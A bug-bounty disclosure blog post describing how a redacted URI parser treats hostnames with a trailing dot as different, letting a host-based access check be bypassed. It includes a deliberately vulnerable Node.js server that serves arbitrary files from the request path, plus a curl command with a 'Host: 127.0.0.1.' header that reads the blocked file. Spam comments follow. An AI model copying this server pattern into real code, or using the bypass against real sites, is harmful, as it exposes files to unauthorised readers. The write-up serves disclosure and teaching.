Abusing URI Parsers for fun and profit

This is a write-up about a security issue I found on one of the famous URI parsers.

Since this was my first discovery in a framework, and since I believe this issue can be found in many different URI parsers and many websites using any sort of url parsers will be still affected (they often lead to high severity bugs), I am disclosing the finding in this paper. To respect terms and policies of the company, I’d redact their name and the parsers name.

It was very long that I opened my PC for hunting security vulnerabilities, I requested invites to Bugcrowd Support which resulted into an invitation from a company whose scope was limited to obversing code on Github. I didn’t have any experiance in testing for issues that way – but while checking out, I thought lets try something new.

Scrolling down the scope items, I found a target like this:

`https://github.com/someName-Of-uri-parser`.

Some days prior to the invitation, I had done some testing on them, analzying how these parsers work and how they handle URLs. So I started off my work.

Explaination

Note that, according to RFC,
https://huntingreads.com
will be exactly same as:
https://huntingreads.com.

Notice a dot at the end.

This is detailed here: rfc1034 which quotes:

Since a complete domain name ends with the root label, this leads to a

printed form which ends in a dot. We use this property to distinguish between:

a character string which represents a complete domain name

(often called “absolute”). For example, “poneria.ISI.EDU.”

a character string that represents the starting labels of a domain name which is incomplete, and should be completed by local software using knowledge of the local domain (often called “relative”). For example, “poneria” used in the ISI.EDU domain.

from RFC 1034

Building Exploit

With this mind I passed the different URLs in comparisons to their framework:

redacted.isequal("https://abc.com", "https://abc.com.")
false

redacted.isequal("https://abc.com", "https://ABC.COM.")
false

redacted.isequal("https://abc.com:80", "https://ABC.COM:.")
false

redacted.isequal("https://abc.com:80", "https://ABC.COM.")
false

redacted.isequal("https://abc.com:443", "https://ABC.COM.")
false

Noticing this behavior, I sent a report mentioning how this can go wrong if websites implement their parsers for deciding any critical/sensitive logic. However, they replied:

Hey Mohammad_Owais,
Thanks for your report. Interesting find.
While it looks like your finding is valid, please provide a security PoC that verifies your theoretical impact.
Thanks,
Redacted

The main focus for any security researcher or bug bounty hunter is to demonstrate an impact by proving it, so I wrote some code as my POC to do that which runs with NodeJS.

Demonstration Code

var http = require('http');
var fs = require('fs');
const URI = require("redacted-parser");

// create a http server
http.createServer(function (req, res) {
    host = req.headers.host
    var fullURL = "http://" + host + req.url;
    if (redacted.isequal(fullURL, "http://127.0.0.1/some-sensitive-file.txt") === true) {
        console.log("This page is forbidden!")
        console.log(fullURL)
        return res.end();
    } else {
        // for other URLs, try responding with the page
        console.log(req.url)
    console.log(fullURL)
        // read requested file
        fs.readFile(req.url.substring(1),
            function(err, data) {        
                if (err) throw err;
                res.writeHead(200);
                res.write(data.toString('utf8'));
                return res.end();
        });
    }
}).listen(80);

So what does this code do is it checks if a user requests for “http://127.0.0.1/some-sensitive-file.txt” endpoint, if he/she does, it restricts him/her from reading its contents, else it loads the contents of an endpoint normally. [there are many different ways of how this can go wrong but I choose this example to demonstrate the impact]

From above, we can conclude that doing something like “curl http://127.0.0.1./readableFile.txt” will return the contents of readableFile.txt, but it will console forbidden message if some-sensitive-file.txt is attempted to read.

example showing the path is restrcited

Due to the issue, we can still read its contents if we append a dot on host value. The simple curl request with any flags won’t work BTW because curl will generally strip off the dot.

So to read the restrcited file, we can do:

curl -v http://127.0.0.1./some-sensitive-file.txt -H “Host: 127.0.0.1.”

POC PIC:

I also found some other issues in their parsers which they denied to accept them by saying their focus for the framework is to parse URIs and not URLs – but I am sure that will be a good to know when testing other websites which rely on these parsers. Therefore I might be writing on those issues too near in futute – but for now – hope you enjoyed reading. 🙂

TIMELINE:

Time-To-Triage –> 2 days

Bounty-Rewarded –> After a month approx.

Reward –> $500

Questions? –> Ask below

9 thoughts on “Abusing URI Parsers for fun and profit

  1. Excellent article, I need to improve the content i have truly.

    I have attempted to blog on third part platforms, it did just

    not transpire the true way I needed it to. However your website
    has
    offering me a hope to achieve this. I shall be bookmarking your website
    and checking it out from time to time. Thank you!

  2. Еxcellent blog here! Аlso your site lots uρ fast!
    What host are you the usage of? Can I ɡet your associɑte link in your host?
    I desіre my ᴡebsite loaded up as fast as yourѕ lol

  3. I loved as much aѕ you will receive carried out right here.
    The sketch is attrаctive, your authߋred materіal stylish.

    nonetһeleѕs, y᧐u command get bought an shakiness
    over that you wish bе delivering the following. unwell unquestionably ϲome more
    formerly again as exactⅼy the sɑme nearly very often inside сase you shield thiѕ hike.

Leave a Reply

Your email address will not be published. Required fields are marked *